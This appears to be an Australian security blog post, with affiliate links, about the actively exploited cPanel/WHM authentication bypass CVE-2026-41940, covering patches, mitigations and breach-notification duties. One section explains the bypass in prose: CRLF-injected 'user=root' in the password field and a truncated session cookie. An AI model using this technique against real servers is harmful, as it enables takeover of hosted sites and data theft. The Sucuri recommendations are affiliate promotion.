1 May 2026 Vulnerability

CVE-2026-41940: cPanel & WHM's Critical Authentication Bypass Is Under Active Attack in Australia

A critical authentication bypass in cPanel and WebHost Manager (WHM) has been actively exploited in Australia since at least February 2026 — a full two months before cPanel disclosed the flaw or issued a patch. Tracked as CVE-2026-41940 and scored CVSS 9.8, the vulnerability allows an unauthenticated attacker to gain full administrative control of a cPanel server, and by extension, every website, database, and email account it manages. Australia's ACSC confirmed active exploitation on 30 April 2026, the same day cPanel released emergency patches. With an estimated 70 million domains running on cPanel globally, the window for exploitation was large, and patching alone is not the end of the story.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

What Is CVE-2026-41940, and Why Is It Rated CVSS 9.8?

cPanel and WebHost Manager (WHM) are the control panel software running on the majority of shared and managed web hosting infrastructure worldwide. If you use a hosting provider — for a WordPress site, a small business email, an e-commerce store, or a web application — there is a reasonable chance the server is managed with cPanel. According to the vendor's own figures, cPanel infrastructure underpins roughly 70 million domains across hundreds of thousands of hosting servers globally.

CVE-2026-41940 is a missing authentication vulnerability, classified under CWE-306 (Missing Authentication for Critical Function), that allows an unauthenticated remote attacker to bypass cPanel's login process entirely and gain administrative access to the hosting panel. The National Vulnerability Database rates it CVSS 9.8 out of 10 — the near-maximum severity assigned to remotely exploitable, pre-authentication flaws requiring no interaction from a legitimate user. The vulnerability affects all supported cPanel and WHM versions released after version 11.40, a release from 2013, meaning over a decade of software versions are in scope. WP Squared, a WordPress hosting management panel built on the cPanel platform, is also affected.

The scope of what "administrative access to cPanel" means in practice is worth spelling out. A successful attacker gains control over:

All websites hosted on the server, including the ability to modify, replace, or inject content into pages
All databases (MySQL/MariaDB), including customer records, order histories, and stored credentials
All email accounts managed through the server
Server-level configuration files, DNS settings, and SSL certificates
The ability to install software, create backdoors, and exfiltrate data silently

For a small business whose hosting account contains their website, their customer data, and their business email, a full cPanel compromise is effectively a complete breach. Under Australia's Notifiable Data Breaches (NDB) scheme, an organisation that is unable to rule out unauthorised access to personal information held on a compromised server has obligations to assess and, in most cases, notify the Office of the Australian Information Commissioner (OAIC) — a process that carries legal deadlines, reputational costs, and in some cases, regulatory scrutiny.

cPanel released patches on 30 April 2026. The patched versions are 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5, along with WP Squared version 136.1.7. Shared hosting providers typically apply these updates automatically; customers on self-managed or semi-managed virtual private servers need to verify their version and update manually.

A Zero-Day Exploited for Two Months Before Disclosure

The timeline of CVE-2026-41940 is what distinguishes it from a routine critical patch. Managed hosting provider KnownHost confirmed that targeted exploitation of the vulnerability was observed as early as 23 February 2026, and security researchers believe exploitation may have begun even earlier. The flaw was not publicly disclosed until 30 April 2026 — meaning attackers operated with an uncontested window of at least two months during which they could exploit vulnerable servers without any defender having a patch, a CVE number, or even public knowledge that the flaw existed.

This zero-day exploitation period has a practical implication that extends beyond "patch now": servers that were accessible to the internet during the February–April window should be treated as potentially compromised, not merely unpatched. Patching a server closes the door, but it does not evict an attacker who has already entered. Persistence mechanisms — backdoor scripts, modified configuration files, rogue SSH keys, or web shells — may have been installed well before the patch became available.

CISA added CVE-2026-41940 to its Known Exploited Vulnerabilities (KEV) catalogue, citing evidence of active exploitation in the wild. The KEV is maintained as an authoritative list of vulnerabilities with confirmed attacker activity; inclusion is not speculative. For Australian government agencies and regulated entities, the CISA KEV has become an informal reference point alongside ACSC advisories for prioritising remediation timelines.

Australia's ACSC issued its own advisory on 30 April 2026 confirming that it was aware of active exploitation of CVE-2026-41940 in Australia. The advisory notes that successful exploitation enables authentication bypass and potential remote code execution — the latter being an extension of the initial access path that allows attackers to execute arbitrary commands on the underlying server operating system, not merely manipulate the cPanel interface. For Australian small businesses and website operators, an ACSC advisory represents the most direct signal from the national cyber authority that a threat is actively targeting domestic infrastructure.

The combination of a near-maximum CVSS score, confirmed exploitation in Australia before public disclosure, CISA KEV listing, and cPanel's enormous installed base makes CVE-2026-41940 one of the more consequential hosting-layer vulnerabilities of 2026. Security outlet Help Net Security reported that over 1.5 million cPanel instances are potentially at risk.

How the Authentication Bypass Works

The technical root cause of CVE-2026-41940 is a CRLF injection vulnerability in cPanel's login and session management process. Security researchers at watchTowr Labs published an analysis after the patch was released, and the mechanics illustrate why this class of vulnerability is difficult to detect from the outside and easy to exploit once understood.

When a user attempts to log in to cPanel, the software writes request data — including user-supplied input from the login form — into a server-side session file before it has verified the user's identity. This is an architectural problem: data from an unauthenticated user is being stored as session state before authentication has been confirmed. Normally, this would be harmless if input were strictly sanitised. It is not.

An attacker can embed carriage return and line feed characters (\r\n) into the password field of the login request. Because cPanel writes this input into the session file without sanitising for line-break characters, the attacker can inject arbitrary key-value pairs into the session record. By inserting content such as user=root into the session file, the attacker causes cPanel to load a session that already contains administrative credentials — without ever having provided a valid password. The server is, in effect, told that the attacker is already a trusted administrator.

A secondary attack path involves manipulating the whostmgrsession cookie. By omitting an expected segment of the cookie value, an attacker can bypass the encryption and verification steps that would normally reject an unauthenticated session. The two approaches can be combined to reliably obtain root-level access to the WHM administrative interface from a single unauthenticated HTTP request.

What attackers do once inside

Once an attacker holds WHM administrative access, their options are broad and the consequences for hosted websites immediate:

Persistence: Creating new cPanel accounts with attacker-controlled credentials that survive any password reset of the original admin account
DNS hijacking: Modifying zone files to redirect traffic from legitimate domains to attacker-controlled infrastructure
Web shell deployment: Installing PHP web shells or backdoor scripts into website directories, providing persistent command execution
Data exfiltration: Accessing and downloading database contents, including customer records, payment tokens, and stored password hashes
Skimming attacks: Injecting malicious JavaScript into site pages to harvest payment card details from checkout flows in real time

Researchers noted that a proof-of-concept (PoC) exploit became publicly available shortly after the patch release on 30 April 2026. The availability of a public PoC significantly lowers the barrier for less sophisticated attackers, shifting exploitation from targeted activity to broad opportunistic scanning of internet-facing cPanel ports. Any server not yet patched after the PoC's release is facing a materially wider threat pool than during the original zero-day window.

What to Do Right Now: Patching, Mitigation, and Compromise Assessment

The immediate priority is confirming whether the patch has been applied to any servers running cPanel or WHM. For shared hosting customers, your provider should have pushed updates automatically — verify by logging in to cPanel and checking the version number in the footer, or navigating to WHM > cPanel > Upgrade to Latest Version. The patched versions are 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5. If your server is running an earlier version number in any of these branches, the update has not yet been applied.

For customers on self-managed virtual private servers or dedicated servers, the standard update command run as root is /scripts/upcp --force. After updating, confirm the version number reflects a patched release before treating the server as protected.

Network-level mitigation can reduce exposure even before patching is confirmed. The ACSC advisory recommends blocking inbound traffic on cPanel's management ports at the firewall: port 2083 (cPanel), port 2087 (WHM), port 2095 (Webmail), and port 2096 (Webmail SSL). Restricting these to a defined allowlist of trusted IP addresses — your office IP, a VPN exit node, or your managed hosting provider's IP range — removes the attack surface entirely. For servers where web management access can be VPN-gated, this is the appropriate architecture regardless of patch status and should be considered permanent configuration, not just a temporary workaround.

Credential rotation is mandatory for any server exposed to the internet during the February–April window. Change the root password, all cPanel account passwords, all database credentials, and any API tokens or SSH keys stored on the server. If attackers created new accounts during the exploitation window, those accounts may persist even after a password reset of the original admin — audit your user list for unexpected accounts, particularly any created between late February and the end of April 2026.

Compromise assessment is where the picture becomes more complex for Australian businesses. Patching does not confirm the server was not already compromised during the zero-day window. A server that was internet-facing from February to April 2026 and running a vulnerable cPanel version should be treated as potentially containing attacker-placed persistence mechanisms. Manual review of recently modified files, scheduled tasks (cron jobs), and server logs is a starting point but is not comprehensive — sophisticated attackers routinely clear or modify logs as part of their post-exploitation tradecraft.

For Australian small businesses and website operators who need deeper assurance, Sucuri's website security platform provides server-side malware scanning that goes beyond what browser-based or external scanners can reach. Sucuri performs deep file-level analysis to detect injected PHP, web shells, and secondary backdoor scripts — precisely the category of persistence that a cPanel attacker would place. The platform's malware removal service is available for sites where the scope of an existing compromise needs to be assessed and cleaned professionally, including sites where the attacker's dwell time during the zero-day window is uncertain.

The Australian Context: NDB Obligations and Layered Web Hosting Defence

Australia's Notifiable Data Breaches scheme, operating under the Privacy Act 1988, creates specific obligations for organisations that hold personal information. If a cPanel server compromise resulted in unauthorised access to customer records, contact information, or any personal data — including names and email addresses captured through website forms or stored in e-commerce databases — the entity responsible for that data has obligations to assess the breach and, in most cases, to notify the OAIC within 30 days of becoming aware of it.

"Becoming aware" has been interpreted broadly by the OAIC to mean the point at which a reasonable suspicion of a breach arises, not when it is confirmed by forensic evidence. An organisation that learns of CVE-2026-41940, determines their server ran a vulnerable version during the zero-day window, and cannot rule out compromise has, in the OAIC's framing, grounds to begin the formal assessment process. Waiting for forensic confirmation before initiating assessment is not consistent with the scheme's obligations under the Privacy Act.

For organisations running Australia-facing e-commerce sites on cPanel hosting, the data categories at risk extend beyond contact details to include order histories, delivery addresses, and potentially stored payment information depending on the checkout configuration. Payment card data carries additional obligations under the PCI DSS framework, and any indication of compromise affecting card data may also trigger notification to the relevant payment processor and acquiring bank.

Beyond this incident, CVE-2026-41940 illustrates a recurring vulnerability pattern for shared hosting infrastructure: control planes — the software that manages servers — are frequently less hardened than the applications running on top of them. Hardening a WordPress installation with strong passwords and up-to-date plugins does nothing if the cPanel layer underneath can be bypassed without authentication. The attack surface extends below the application layer.

A layered defence posture for Australian website operators should include the following, independent of any specific vulnerability:

Restricting cPanel and WHM ports to known IP ranges at the firewall level, not just as a post-incident response
Enabling two-factor authentication (2FA) on all cPanel accounts where the feature is available — cPanel has supported TOTP-based 2FA since version 11.54
Subscribing to cPanel security notifications so vendor advisories are received when released, not days after exploitation has begun
Running continuous file-level malware scanning, not just perimeter or blacklist-based scanning
Maintaining an inventory of what personal data is stored on each hosted server, so that the scope of any breach assessment can be determined quickly

For the scanning and web application firewall layer, Sucuri Website Security provides both continuous file monitoring and a WAF that can filter malicious HTTP requests — including the kind of CRLF-manipulated login attempts that exploit CVE-2026-41940 — before they reach the cPanel interface. A WAF positioned in front of web-facing management interfaces adds a detection and blocking layer that log-level monitoring alone cannot provide, and is particularly valuable during the window between vulnerability disclosure and patch deployment.

For businesses with questions about their NDB obligations following a potential hosting compromise, the OAIC publishes an online assessment tool at oaic.gov.au, and the ACSC's cyber incident reporting form at cyber.gov.au is the appropriate starting point for reporting suspected exploitation to the national cyber authority.